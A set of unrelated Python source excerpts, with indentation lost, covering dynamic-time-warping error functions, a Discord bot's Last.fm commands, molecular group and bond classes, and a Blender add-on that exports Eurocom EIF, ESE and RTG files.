valids = np.argwhere(np.logical_and(np.abs(ds1) > 0, np.abs(ds2) > 0))
coh[valids] = dcs[valids] / (ds1[valids] * ds2[valids])
coh[coh > (1.0 + 0j)] = 1.0 + 0j
return coh
def computeErrorFunction(u1, u0, nSample, lag, norm='L2'):
"""
compute Error Function used in DTW. The error function is equation 1 in Hale, 2013. You could uncomment the
L1 norm and comment the L2 norm if you want on Line 29
Parameters
--------------
u1: trace that we want to warp; size = (nsamp,1)
u0: reference trace to compare with: size = (nsamp,1)
nSample: numer of points to compare in the traces
lag: maximum lag in sample number to search
norm: 'L2' or 'L1' (default is 'L2')
RETURNS:
------------------
err: the 2D error function; size = (nsamp,2*lag+1)
Original by <NAME>
Last modified by <NAME> (25 Feb. 2015)
Translated to python by <NAME> (17 Aug. 2018)
"""
if lag >= nSample:
raise ValueError('computeErrorFunction:lagProblem','lag must be smaller than nSample')
# Allocate error function variable
err = np.zeros([nSample, 2 * lag + 1])
# initial error calculation
# loop over lags
for ll in np.arange(-lag,lag + 1):
thisLag = ll + lag
# loop over samples
for ii in range(nSample):
# skip corners for now, we will come back to these
if (ii + ll >= 0) & (ii + ll < nSample):
err[ii,thisLag] = u1[ii] - u0[ii + ll]
if norm == 'L2':
err = err**2
elif norm == 'L1':
err = np.abs(err)
# Now fix corners with constant extrapolation
for ll in np.arange(-lag,lag + 1):
thisLag = ll + lag
for ii in range(nSample):
if ii + ll < 0:
err[ii, thisLag] = err[-ll, thisLag]
elif ii + ll > nSample - 1:
err[ii,thisLag] = err[nSample - ll - 1,thisLag]
return err
def accumulateErrorFunction(dir, err, nSample, lag, b ):
"""
accumulation of the error, which follows the equation 6 in Hale, 2013.
Parameters
--------------
dir: accumulation direction ( dir > 0 = forward in time, dir <= 0 = backward in time)
err: the 2D error function; size = (nsamp,2*lag+1)
nSample: numer of points to compare in the traces
lag: maximum lag in sample number to search
b: strain limit (integer value | |
import asyncio
import html
import io
import math
import os
import random
import re
import urllib.parse
import aiohttp
import arrow
import colorgram
import discord
import kdtree
from bs4 import BeautifulSoup
from discord.ext import commands
from PIL import Image
from modules import emojis, exceptions, util
LASTFM_APPID = os.environ.get("LASTFM_APIKEY")
LASTFM_TOKEN = os.environ.get("LASTFM_SECRET")
GOOGLE_API_KEY = os.environ.get("GOOGLE_KEY")
AUDDIO_TOKEN = os.environ.get("AUDDIO_TOKEN")
MISSING_IMAGE_HASH = "2a96cbd8b46e442fc41c2b86b821562f"
def is_small_server():
async def predicate(ctx):
users = await ctx.bot.db.execute(
"""
SELECT count(*) FROM user_settings WHERE user_id IN %s
AND lastfm_username IS NOT NULL
""",
[user.id for user in ctx.guild.members],
one_value=True,
)
if users > 150:
raise exceptions.ServerTooBig(ctx.guild.member_count)
return True
return commands.check(predicate)
class AlbumColorNode:
def __init__(self, rgb, image_url):
self.rgb = rgb
self.data = image_url
def __len__(self):
return len(self.rgb)
def __getitem__(self, i):
return self.rgb[i]
def __str__(self):
return f"rgb{self.rgb}"
def __repr__(self):
return f"AlbumColorNode({self.rgb}, {self.data})"
class LastFm(commands.Cog):
"""LastFM commands"""
def __init__(self, bot):
self.bot = bot
self.icon = "🎵"
self.lastfm_red = "b90000"
self.cover_base_urls = [
"https://lastfm.freetls.fastly.net/i/u/34s/{0}",
"https://lastfm.freetls.fastly.net/i/u/64s/{0}",
"https://lastfm.freetls.fastly.net/i/u/174s/{0}",
"https://lastfm.freetls.fastly.net/i/u/300x300/{0}",
"https://lastfm.freetls.fastly.net/i/u/{0}",
]
with open("html/fm_chart.min.html", "r", encoding="utf-8") as file:
self.chart_html = file.read().replace("\n", "")
@commands.group(case_insensitive=True)
async def fm(self, ctx):
await username_to_ctx(ctx)
if ctx.invoked_subcommand is None:
await util.command_group_help(ctx)
@fm.command()
async def set(self, ctx, username):
"""Save your Last.fm username."""
if ctx.foreign_target:
raise exceptions.Warning("You cannot set Last.fm username for someone else!")
content = await self.get_userinfo_embed(username)
if content is None:
raise exceptions.Warning(f"Last.fm profile `{username}` was not found")
await self.bot.db.execute(
"""
INSERT INTO user_settings (user_id, lastfm_username)
VALUES (%s, %s)
ON DUPLICATE KEY UPDATE
lastfm_username = VALUES(lastfm_username)
""",
ctx.author.id,
username,
)
await ctx.send(
f"{ctx.author.mention} Last.fm username saved as `{username}`", embed=content
)
@fm.command()
async def unset(self, ctx):
"""Unlink your Last.fm."""
if ctx.foreign_target:
raise exceptions.Warning("You cannot unset someone else's Last.fm username!")
await self.bot.db.execute(
"""
INSERT INTO user_settings (user_id, lastfm_username)
VALUES (%s, %s)
ON DUPLICATE KEY UPDATE
lastfm_username = VALUES(lastfm_username)
""",
ctx.author.id,
None,
)
await ctx.send(":broken_heart: Removed your Last.fm username from the database")
@fm.command()
async def profile(self, ctx):
"""Last.fm profile."""
await ctx.send(embed=await self.get_userinfo_embed(ctx.username))
@fm.command(aliases=["yt"])
async def youtube(self, ctx):
"""See your current song on youtube."""
data = await self.api_request(
{"user": ctx.username, "method": "user.getrecenttracks", "limit": 1}
)
tracks = data["recenttracks"]["track"]
if not tracks:
raise exceptions.Info("You have not listened to anything yet!")
username = data["recenttracks"]["@attr"]["user"]
artist = tracks[0]["artist"]["#text"]
track = tracks[0]["name"]
state = "Most recent track"
track_attr = tracks[0].get("@attr")
if track_attr is not None and "nowplaying" in track_attr:
state = "Now Playing"
url = "https://www.googleapis.com/youtube/v3/search"
params = {
"part": "snippet",
"type": "video",
"maxResults": 1,
"q": f"{artist} {track}",
"key": GOOGLE_API_KEY,
}
async with aiohttp.ClientSession() as session:
async with session.get(url, params=params) as response:
data = await response.json()
video_id = data["items"][0]["id"]["videoId"]
video_url = f"https://youtube.com/watch?v={video_id}"
await ctx.send(f"**{username} — {state}** :cd:\n{video_url}")
@fm.command(aliases=["np", "no"])
async def nowplaying(self, ctx):
"""Your currently playing song."""
data = await self.api_request(
{"user": ctx.username, "method": "user.getrecenttracks", "limit": 1}
)
tracks = data["recenttracks"]["track"]
if not tracks:
raise exceptions.Info("You have not listened to anything yet!")
artist = tracks[0]["artist"]["#text"]
album = tracks[0]["album"]["#text"]
track = tracks[0]["name"]
image_url = tracks[0]["image"][-1]["#text"]
content = discord.Embed()
content.colour = await self.cached_image_color(image_url)
content.description = f":cd: **{util.escape_md(album)}**"
content.title = f"**{util.escape_md(artist)} — *{util.escape_md(track)}* **"
content.set_thumbnail(url=image_url)
# tags and playcount
trackdata = await self.api_request(
{"user": ctx.username, "method": "track.getInfo", "artist": artist, "track": track},
ignore_errors=True,
)
if trackdata is not None:
tags = []
try:
trackdata = trackdata["track"]
playcount = int(trackdata["userplaycount"])
if playcount > 0:
content.description += f"\n> {playcount} {format_plays(playcount)}"
for tag in trackdata["toptags"]["tag"]:
tags.append(tag["name"])
content.set_footer(text=", ".join(tags))
except (KeyError, TypeError):
pass
# play state
np = "@attr" in tracks[0] and "nowplaying" in tracks[0]["@attr"]
state = "> Now Playing" if np else "II Last track"
if not np:
content.timestamp = arrow.get(int(tracks[0]["date"]["uts"])).datetime
content.set_author(
name=f"{util.displayname(ctx.usertarget, escape=False)} {state}",
icon_url=ctx.usertarget.avatar_url,
)
await ctx.send(embed=content)
@fm.command(aliases=["ta"])
async def topartists(self, ctx, *args):
"""
Most listened artists.
Usage:
>fm topartists [timeframe] [amount]
"""
arguments = parse_arguments(args)
if arguments["period"] == "today":
data = await self.custom_period(ctx.username, "artist")
else:
data = await self.api_request(
{
"user": ctx.username,
"method": "user.gettopartists",
"period": arguments["period"],
"limit": arguments["amount"],
}
)
user_attr = data["topartists"]["@attr"]
artists = data["topartists"]["artist"][: arguments["amount"]]
if not artists:
raise exceptions.Info("You have not listened to anything yet!")
rows = []
for i, artist in enumerate(artists, start=1):
name = util.escape_md(artist["name"])
plays = artist["playcount"]
rows.append(f"`#{i:2}` **{plays}** {format_plays(plays)} : **{name}**")
image_url = await self.get_artist_image(artists[0]["name"])
formatted_timeframe = humanized_period(arguments["period"]).capitalize()
content = discord.Embed()
content.colour = await self.cached_image_color(image_url)
content.set_thumbnail(url=image_url)
content.set_footer(text=f"Total unique artists: {user_attr['total']}")
content.set_author(
name=f"{util.displayname(ctx.usertarget, escape=False)} — {formatted_timeframe} top artists",
icon_url=ctx.usertarget.avatar_url,
)
await util.send_as_pages(ctx, content, rows, 15)
@fm.command(aliases=["talb"])
async def topalbums(self, ctx, *args):
"""
Most listened albums.
Usage:
>fm topalbums [timeframe] [amount]
"""
arguments = parse_arguments(args)
if arguments["period"] == "today":
data = await self.custom_period(ctx.username, "album")
else:
data = await self.api_request(
{
"user": ctx.username,
"method": "user.gettopalbums",
"period": arguments["period"],
"limit": arguments["amount"],
}
)
user_attr = data["topalbums"]["@attr"]
albums = data["topalbums"]["album"][: arguments["amount"]]
if not albums:
raise exceptions.Info("You have not listened to anything yet!")
rows = []
for i, album in enumerate(albums, start=1):
name = util.escape_md(album["name"])
artist_name = util.escape_md(album["artist"]["name"])
plays = album["playcount"]
rows.append(
f"`#{i:2}` **{plays}** {format_plays(plays)} : **{artist_name}** — ***{name}***"
)
image_url = albums[0]["image"][-1]["#text"]
formatted_timeframe = humanized_period(arguments["period"]).capitalize()
content = discord.Embed()
content.colour = await self.cached_image_color(image_url)
content.set_thumbnail(url=image_url)
content.set_footer(text=f"Total unique albums: {user_attr['total']}")
content.set_author(
name=f"{util.displayname(ctx.usertarget, escape=False)} — {formatted_timeframe} top albums",
icon_url=ctx.usertarget.avatar_url,
)
await util.send_as_pages(ctx, content, rows, 15)
@fm.command(aliases=["tt"])
async def toptracks(self, ctx, *args):
"""
Most listened tracks.
Usage:
>fm toptracks [timeframe] [amount]
"""
arguments = parse_arguments(args)
if arguments["period"] == "today":
data = await self.custom_period(ctx.username, "track")
else:
data = await self.api_request(
{
"user": ctx.username,
"method": "user.gettoptracks",
"period": arguments["period"],
"limit": arguments["amount"],
}
)
user_attr = data["toptracks"]["@attr"]
tracks = data["toptracks"]["track"][: arguments["amount"]]
if not tracks:
raise exceptions.Info("You have not listened to anything yet!")
rows = []
for i, track in enumerate(tracks, start=1):
if i == 1:
image_url = await self.get_artist_image(tracks[0]["artist"]["name"])
name = util.escape_md(track["name"])
artist_name = util.escape_md(track["artist"]["name"])
plays = track["playcount"]
rows.append(
f"`#{i:2}` **{plays}** {format_plays(plays)} : **{artist_name}** — ***{name}***"
)
formatted_timeframe = humanized_period(arguments["period"]).capitalize()
content = discord.Embed()
content.colour = await self.cached_image_color(image_url)
content.set_thumbnail(url=image_url)
content.set_footer(text=f"Total unique tracks: {user_attr['total']}")
content.set_author(
name=f"{util.displayname(ctx.usertarget, escape=False)} — {formatted_timeframe} top tracks",
icon_url=ctx.usertarget.avatar_url,
)
await util.send_as_pages(ctx, content, rows, 15)
@fm.command(aliases=["recents", "re"])
async def recent(self, ctx, size="15"):
"""Recently listened to tracks."""
try:
size = abs(int(size))
except ValueError:
size = 15
data = await self.api_request(
{"user": ctx.username, "method": "user.getrecenttracks", "limit": size}
)
user_attr = data["recenttracks"]["@attr"]
tracks = data["recenttracks"]["track"][:size]
if not tracks:
raise exceptions.Info("You have not listened to anything yet!")
rows = []
for track in tracks:
name = util.escape_md(track["name"])
artist_name = util.escape_md(track["artist"]["#text"])
rows.append(f"**{artist_name}** — ***{name}***")
image_url = tracks[0]["image"][-1]["#text"]
content = discord.Embed()
content.colour = await self.cached_image_color(image_url)
content.set_thumbnail(url=image_url)
content.set_footer(text=f"Total scrobbles: {user_attr['total']}")
content.set_author(
name=f"{util.displayname(ctx.usertarget, escape=False)} — Recent tracks",
icon_url=ctx.usertarget.avatar_url,
)
await util.send_as_pages(ctx, content, rows, 15)
@fm.command()
async def last(self, ctx, timeframe):
"""
Your week/month/year listening overview.
Usage:
>fm last week
>fm last month (requires lastfm pro)
>fm last year
"""
timeframe = timeframe.lower()
if timeframe not in ["week", "month", "year"]:
raise exceptions.Info("Available timeframes: `[ week | month | year ]`")
if timeframe != "week":
raise exceptions.Warning(
"Only the weekly listening report is currently available due to a Last.fm change, sorry for the inconvenience!"
)
await self.listening_report(ctx, timeframe)
@fm.command()
async def artist(self, ctx, timeframe, datatype, *, artistname=""):
"""
Artist specific data.
Usage:
>fm artist [timeframe] toptracks <artist name>
>fm artist [timeframe] topalbums <artist name>
>fm artist [timeframe] overview <artist name>
"""
period = get_period(timeframe)
if period in [None, "today"]:
artistname = " ".join([datatype, artistname]).strip()
datatype = timeframe
period = "overall"
artistname = remove_mentions(artistname)
if artistname.lower() == "np":
artistname = (await self.getnowplaying(ctx))["artist"]
if artistname is None:
raise exceptions.Warning("Could not get currently playing artist!")
if artistname == "":
return await ctx.send("Missing artist name!")
if datatype in ["toptracks", "tt", "tracks", "track"]:
datatype = "tracks"
elif datatype in ["topalbums", "talb", "albums", "album"]:
datatype = "albums"
elif datatype in ["overview", "stats", "ov"]:
return await self.artist_overview(ctx, period, artistname)
else:
return await util.send_command_help(ctx)
artist, data = await self.artist_top(ctx, period, artistname, datatype)
if artist is None or not data:
artistname = util.escape_md(artistname)
if period == "overall":
return await ctx.send(f"You have never listened to **{artistname}**!")
return await ctx.send(
f"You have not listened to **{artistname}** in the past {period}s!"
)
total = 0
rows = []
for i, (name, playcount) in enumerate(data, start=1):
rows.append(
f"`#{i:2}` **{playcount}** {format_plays(playcount)} — **{util.escape_md(name)}**"
)
total += playcount
artistname = urllib.parse.quote_plus(artistname)
content = discord.Embed()
content.set_thumbnail(url=artist["image_url"])
content.colour = await self.cached_image_color(artist["image_url"])
content.set_author(
name=f"{util.displayname(ctx.usertarget, escape=False)} — "
+ (f"{humanized_period(period)} " if period != "overall" else | |
defaultAtom.label)
#For some reason the default when no lone pairs is set to -100,
#Based on git history, it is probably because RDKit requires a number instead of None
#Instead we will set it to 0 here
#Hard code charge for a few atomtypes
if atomtype in [atomTypes[x] for x in ['N5d', 'N5dd', 'N5t', 'N5b', 'N5s']]:
newAtom.lonePairs = 0
newAtom.charge = 1
elif atomtype in [atomTypes[x] for x in ['N1d']]:
newAtom.charge = -1
elif newAtom.lonePairs == -100:
newAtom.lonePairs = defaultLonePairs[newAtom.symbol]
return newAtom
################################################################################
class GroupBond(Edge):
"""
A bond group. This class is based on the :class:`Bond` class, except that
all attributes are lists rather than individual values. The allowed bond
types are given :ref:`here <bond-types>`. The attributes are:
=================== =================== ====================================
Attribute Type Description
=================== =================== ====================================
`order` ``list`` The allowed bond orders (as character strings)
=================== =================== ====================================
Each list represents a logical OR construct, i.e. a bond will match the
group if it matches *any* item in the list.
"""
def __init__(self, atom1, atom2, order=None):
Edge.__init__(self, atom1, atom2)
if order is not None and all([isinstance(oneOrder,str) for oneOrder in order]):
self.setOrderStr(order)
elif order is not None and any([isinstance(oneOrder,str) for oneOrder in order]):
raise ActionError('order list given {} does not consist of only strings or only numbers'.format(order))
else:
self.order = order or []
def __str__(self):
"""
Return a human-readable string representation of the object.
"""
return str(self.order)
def __repr__(self):
"""
Return a representation that can be used to reconstruct the object.
"""
return "<GroupBond {0!r}>".format(self.order)
def __reduce__(self):
"""
A helper function used when pickling an object.
"""
return (GroupBond, (self.vertex1, self.vertex2, self.order))
def copy(self):
"""
Return a deep copy of the :class:`GroupBond` object. Modifying the
attributes of the copy will not affect the original.
"""
return GroupBond(self.vertex1, self.vertex2, self.order[:])
def getOrderStr(self):
"""
returns a list of strings representing the bond order
"""
values = []
for value in self.order:
if value == 1:
values.append('S')
elif value == 2:
values.append('D')
elif value == 3:
values.append('T')
elif value == 1.5:
values.append('B')
else:
raise TypeError('Bond order number {} is not hardcoded as a string'.format(value))
return values
def setOrderStr(self, newOrder):
"""
set the bond order using a valid bond-order character list
"""
values = []
for value in newOrder:
if value == 'S':
values.append(1)
elif value == 'D':
values.append(2)
elif value == 'T':
values.append(3)
elif value == 'B':
values.append(1.5)
else:
raise TypeError('Bond order {} is not hardcoded into this method'.format(value))
self.order = values
def getOrderNum(self):
"""
returns the bond order as a list of numbers
"""
return self.order
def setOrderNum(self, newOrder):
"""
change the bond order with a list of numbers
"""
self.order = newOrder
def isSingle(self, wildcards = False):
"""
Return ``True`` if the bond represents a single bond or ``False`` if
not. If `wildcards` is ``False`` we return False anytime there is more
than one bond order, otherwise we return ``True`` if any of the options
are single.
NOTE: we can replace the absolute value relation with math.isclose when
we swtich to python 3.5+
"""
if wildcards:
for order in self.order:
if abs(order-1) <= 1e-9:
return True
else: return False
else:
return abs(self.order[0]-1) <= 1e-9 and len(self.order) == 1
def isDouble(self, wildcards = False):
"""
Return ``True`` if the bond represents a double bond or ``False`` if
not. If `wildcards` is ``False`` we return False anytime there is more
than one bond order, otherwise we return ``True`` if any of the options
are double.
"""
if wildcards:
for order in self.order:
if abs(order-2) <= 1e-9:
return True
else: return False
else:
return abs(self.order[0]-2) <= 1e-9 and len(self.order) == 1
def isTriple(self, wildcards = False):
"""
Return ``True`` if the bond represents a triple bond or ``False`` if
not. If `wildcards` is ``False`` we return False anytime there is more
than one bond order, otherwise we return ``True`` if any of the options
are triple.
"""
if wildcards:
for order in self.order:
if abs(order-3) <= 1e-9:
return True
else: return False
else:
return abs(self.order[0]-3) <= 1e-9 and len(self.order) == 1
def isBenzene(self, wildcards = False):
"""
Return ``True`` if the bond represents a benzene bond or ``False`` if
not. If `wildcards` is ``False`` we return False anytime there is more
than one bond order, otherwise we return ``True`` if any of the options
are benzene
"""
if wildcards:
for order in self.order:
if abs(order-1.5) <= 1e-9:
return True
else: return False
else:
return abs(self.order[0]-1.5) <= 1e-9 and len(self.order) == 1
def __changeBond(self, order):
"""
Update the bond group as a result of applying a CHANGE_BOND action,
where `order` specifies whether the bond is incremented or decremented
in bond order. `order` is normally 1 or -1, but can be any value
"""
newOrder = [value + order for value in self.order]
if any([value < 0 or value > 3 for value in newOrder]):
raise ActionError('Unable to update Bond due to CHANGE_BOND action: Invalid resulting order "{0}".'.format(newOrder))
# Set the new bond orders, removing any duplicates
self.order = list(set(newOrder))
def applyAction(self, action):
"""
Update the bond group as a result of applying `action`, a tuple
containing the name of the reaction recipe action along with any
required parameters. The available actions can be found
:ref:`here <reaction-recipe-actions>`.
"""
if action[0].upper() == 'CHANGE_BOND':
self.__changeBond(action[2])
else:
raise ActionError('Unable to update GroupBond: Invalid action {0}".'.format(action))
def equivalent(self, other):
"""
Returns ``True`` if `other` is equivalent to `self` or ``False`` if not,
where `other` can be either an :class:`Bond` or an :class:`GroupBond`
object.
"""
cython.declare(gb=GroupBond)
if not isinstance(other, GroupBond):
# Let the equivalent method of other handle it
# We expect self to be a Bond object, but can't test for it here
# because that would create an import cycle
return other.equivalent(self)
gb = other
cython.declare(order1=float, order2=float)
# Compare two bond groups for equivalence
# Each atom type in self must have an equivalent in other (and vice versa)
for order1 in self.order:
for order2 in gb.order:
if order1 == order2: break
else:
return False
for order1 in gb.order:
for order2 in self.order:
if order1 == order2: break
else:
return False
# Otherwise the two bond groups are equivalent
return True
def isSpecificCaseOf(self, other):
"""
Returns ``True`` if `other` is the same as `self` or is a more
specific case of `self`. Returns ``False`` if some of `self` is not
included in `other` or they are mutually exclusive.
"""
cython.declare(gb=GroupBond)
if not isinstance(other, GroupBond):
# Let the isSpecificCaseOf method of other handle it
# We expect self to be a Bond object, but can't test for it here
# because that would create an import cycle
return other.isSpecificCaseOf(self)
gb = other
cython.declare(order1=float, order2=float)
# Compare two bond groups for equivalence
# Each atom type in self must have an equivalent in other
for order1 in self.order: # all these must match
for order2 in gb.order: # can match any of these
if order1 == order2: break
else:
return False
# Otherwise self is in fact a specific case of other
return True
def makeBond(self, molecule, atom1, atom2):
"""
Creates a :class: Bond between atom1 and atom2 analogous to self
The intended input arguments should be class :Atom: not class :GroupAtom:
Args:
atom1: First :class: Atom the bond connects
atom2: Second :class: Atom the bond connects
"""
newBond = mol.Bond(atom1, atom2, order = self.order[0])
molecule.addBond(newBond)
class Group(Graph):
"""
A representation of a molecular substructure group using a graph data
type, extending the :class:`Graph` class. The `atoms` and `bonds` attributes
are aliases for the `vertices` and `edges` attributes, and store
:class:`GroupAtom` and :class:`GroupBond` objects, respectively.
Corresponding alias methods have also been provided.
"""
def __init__(self, atoms=None, multiplicity=None):
Graph.__init__(self, atoms)
self.multiplicity = multiplicity if multiplicity else []
self.update()
def __reduce__(self):
"""
A helper function used when pickling an object.
"""
return (Group, (self.vertices,))
def | |
<reponame>Swyter/sphinx-euroland
# Copyright (c) 2020-2021 Swyter <<EMAIL>>
# SPDX-License-Identifier: Zlib
bl_info = {
'name': 'Eurocom 3D formats for Sphinx and the Cursed Mummy™',
'author': 'Swyter, for THQ Nordic GmbH',
'version': (2020, 10, 10),
'blender': (2, 81, 6),
'location': 'File > Import-Export',
'description': 'Export and import EIF, ESE and RTG files compatible with Euroland.',
'warning': 'Importing still doesn\'t work, export in progress. ¯\_(ツ)_/¯',
'doc_url': 'https://sphinxandthecursedmummy.fandom.com/wiki/Technical',
'tracker_url': 'https://discord.gg/sphinx',
'support': 'COMMUNITY',
'category': 'Import-Export',
}
import os
import bpy
import bpy.utils.previews
import bmesh
from bpy.props import(
BoolProperty,
FloatProperty,
StringProperty,
EnumProperty,
)
from bpy_extras.io_utils import(
ImportHelper,
ExportHelper,
orientation_helper,
path_reference_mode,
axis_conversion,
)
#===============================================================================================
# IMPORTERS (TO DO)
#===============================================================================================
@orientation_helper(axis_forward='-Z', axis_up='Y')
class ImportRTG(bpy.types.Operator, ImportHelper):
"""Load a dynamic Maya Euroland file; for animations, scripts and maps"""
bl_idname = "import_scene.rtg"
bl_label = "Import RTG"
bl_options = {'PRESET', 'UNDO'}
filename_ext = ".rtg"
filter_glob: StringProperty(default="*.rtg", options={'HIDDEN'})
def execute(self, context):
print("Selected: " + context.active_object.name)
from . import import_rtg
return import_rtg.load(context, self.filepath)
def draw(self, context):
pass
@classmethod
def poll(cls, context):
return False
@orientation_helper(axis_forward='-Z', axis_up='Y')
class ImportEIF(bpy.types.Operator, ImportHelper):
"""Load a static 3ds Max Euroland file, for scenes and entities"""
bl_idname = "import_scene.eif"
bl_label = "Import EIF"
bl_options = {'PRESET', 'UNDO'}
filename_ext = ".eif"
filter_glob: StringProperty(default="*.eif", options={'HIDDEN'})
def execute(self, context):
print("Selected: " + context.active_object.name)
from . import import_eif
return import_eif.load(context, self.filepath)
def draw(self, context):
pass
@classmethod
def poll(cls, context):
return False
@orientation_helper(axis_forward='-Z', axis_up='Y')
class ImportESE(bpy.types.Operator, ImportHelper):
"""Load a dynamic 3ds Max Euroland file; for cutscenes and maps"""
bl_idname = "import_scene.ese"
bl_label = "Import ESE"
bl_options = {'PRESET', 'UNDO'}
filename_ext = ".ese"
filter_glob: StringProperty(default="*.ese", options={'HIDDEN'})
def execute(self, context):
print("Selected: " + context.active_object.name)
from . import import_ese
return import_ese.load(context, self.filepath)
def draw(self, context):
pass
@classmethod
def poll(cls, context):
return False
#===============================================================================================
# EXPORTERS (ON IT)
#===============================================================================================
@orientation_helper(axis_forward='Z', axis_up='Y')
class ExportRTG(bpy.types.Operator, ExportHelper):
"""Save a dynamic Maya Euroland file; for animations, scripts and maps"""
bl_idname = "export_scene.rtg"
bl_label = 'Export RTG'
bl_options = {'PRESET'}
filename_ext = ".rtg"
filter_glob: StringProperty(default="*.rtg", options={'HIDDEN'})
path_mode: path_reference_mode
check_extension = True
def execute(self, context):
from . import export_rtg
return export_rtg.save(context, self.filepath)
def draw(self, context):
pass
@orientation_helper(axis_forward='Z', axis_up='Y')
class ExportEIF(bpy.types.Operator, ExportHelper):
"""Save a static 3ds Max Euroland file, for scenes and entities"""
bl_idname = "export_scene.eif"
bl_label = 'Export EIF'
bl_options = {'PRESET'}
filename_ext = ".eif"
filter_glob: StringProperty(default="*.eif", options={'HIDDEN'})
#Output Options
Output_Map: BoolProperty(
name="Output as a Map",
description="Output scene as a new map for EuroLand.",
default=False,
)
Output_Transform: BoolProperty(
name="Transform Objects to (0,0,0)",
description="Transform objects to position (0,0,0).",
default=False,
)
#Scale Options
global_scale: FloatProperty(
name="Scale",
min=0.01,
max=1000.0,
default=1.0,
)
path_mode: path_reference_mode
check_extension = True
def execute(self, context):
from mathutils import Matrix
from . import export_eif
keywords = self.as_keywords(ignore=("axis_forward",
"axis_up",
"global_scale",
"check_existing",
"filter_glob",
"path_mode",
))
global_matrix = (Matrix.Scale(self.global_scale, 4) @ Matrix(((1, 0, 0),(0, 0, 1),(0, 1, 0))).to_4x4())
keywords["global_matrix"] = global_matrix
return export_eif.save(context, **keywords)
def draw(self, context):
pass
class EIF_EXPORT_PT_output_options(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Output Options"
bl_parent_id = "FILE_PT_operator"
@classmethod
def poll(cls, context):
return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_eif"
def draw(self, context):
self.layout.prop(context.space_data.active_operator, 'Output_Map')
self.layout.prop(context.space_data.active_operator, 'Output_Transform')
class EIF_EXPORT_PT_scale(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Transform"
bl_parent_id = "FILE_PT_operator"
@classmethod
def poll(cls, context):
return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_eif"
def draw(self, context):
self.layout.prop(context.space_data.active_operator, "global_scale")
@orientation_helper(axis_forward='Z', axis_up='Y')
class ExportESE(bpy.types.Operator, ExportHelper):
"""Save a dynamic 3ds Max Euroland file; for cutscenes and maps"""
bl_idname = "export_scene.ese"
bl_label = 'Export ESE'
bl_options = {'PRESET'}
filename_ext = ".ese"
filter_glob: StringProperty(default="*.ese", options={'HIDDEN'})
#Output Options
Output_Materials: BoolProperty(
name="Materials",
description="Output scene materials.",
default=False,
)
Output_CameraLightAnims: BoolProperty(
name="Animated Camera/Light settings",
description="Export animations from Camera and Light object types.",
default=False,
)
Output_Animations: BoolProperty(
name="Animations",
description="Export animations.",
default=True,
)
#Output Types
object_types: EnumProperty(
name="Output Types",
options={'ENUM_FLAG'},
items=(('CAMERA', "Cameras", ""),
('LIGHT', "Lights", ""),
('MESH', "Mesh", ""),
),
description="Which kind of object to export",
default={'CAMERA', 'LIGHT', 'MESH'}
)
#Mesh Options
Output_VertexColors : BoolProperty(
name="Vertex Colors",
description="Export vertex colors from each mesh",
default=False,
)
Flip_Polygons: BoolProperty(
name="Flip Polygons",
description="Flip polygons direction in which polygon faces.",
default=False,
)
#Scale Options
global_scale: FloatProperty(
name="Scale",
min=0.01,
max=1000.0,
default=1.0,
)
path_mode: path_reference_mode
check_extension = True
def execute(self, context):
from mathutils import Matrix
from . import export_ese
keywords = self.as_keywords(ignore=("axis_forward",
"axis_up",
"global_scale",
"check_existing",
"filter_glob",
"path_mode",
))
global_matrix = (Matrix.Scale(self.global_scale, 4) @ Matrix(((1, 0, 0),(0, 0, 1),(0, 1, 0))).to_4x4())
keywords["global_matrix"] = global_matrix
return export_ese.save(context, **keywords)
def draw(self, context):
pass
#===============================================================================================
# ESE OUTPUT PANELS OPTIONS
#===============================================================================================
class ESE_EXPORT_PT_output_options(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Output Options"
bl_parent_id = "FILE_PT_operator"
@classmethod
def poll(cls, context):
return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_ese"
def draw(self, context):
self.layout.prop(context.space_data.active_operator, 'Output_Materials')
self.layout.prop(context.space_data.active_operator, 'Output_CameraLightAnims')
self.layout.prop(context.space_data.active_operator, 'Output_Animations')
class ESE_EXPORT_PT_mesh_options(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Mesh Options"
bl_parent_id = "FILE_PT_operator"
@classmethod
def poll(cls, context):
return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_ese"
def draw(self, context):
self.layout.prop(context.space_data.active_operator, 'Flip_Polygons')
self.layout.prop(context.space_data.active_operator, 'Output_VertexColors')
class ESE_EXPORT_PT_object_types(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = ""
bl_parent_id = "FILE_PT_operator"
bl_options = {'HIDE_HEADER'}
@classmethod
def poll(cls, context):
return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_ese"
def draw(self, context):
self.layout.column().prop(context.space_data.active_operator, "object_types")
class ESE_EXPORT_PT_scale(bpy.types.Panel):
bl_space_type = 'FILE_BROWSER'
bl_region_type = 'TOOL_PROPS'
bl_label = "Transform"
bl_parent_id = "FILE_PT_operator"
@classmethod
def poll(cls, context):
return context.space_data.active_operator.bl_idname == "EXPORT_SCENE_OT_ese"
def draw(self, context):
self.layout.prop(context.space_data.active_operator, "global_scale")
last_sel_object = False
last_sel_indexes = False
def scene_update_post_handler(scene):
context = bpy.context
if not (context.object is not None and context.object.type == 'MESH' and bpy.context.mode == 'EDIT_MESH'):
return
cur_sel_object = context.object
cur_sel_indexes = []
# swy: this is a bit backwards, because you can select both at the same time, but works
in_vtx_sel_mode = context.tool_settings.mesh_select_mode[0]
in_fac_sel_mode = context.tool_settings.mesh_select_mode[2]
# swy: make it not work at all in edge mode or whenever both of them are toggled on; use an
# exclusive or / xor operation, so that we only return True if either of them is on
if in_vtx_sel_mode ^ in_fac_sel_mode:
thing = 0
def callback(elem, layer):
# use the parent function's scope: https://stackoverflow.com/a/8178808/674685
nonlocal thing; nonlocal cur_sel_indexes
if (elem.select):
thing |= elem[layer]
cur_sel_indexes.append(elem.index)
iterate_over_mesh(context, callback)
# swy: detect if we need to refresh the currently toggled flag elements;
# only do that if the selection changes; different, not every time
# Note: if we don't do this, we won't let the user change it
global last_sel_object;
global last_sel_indexes
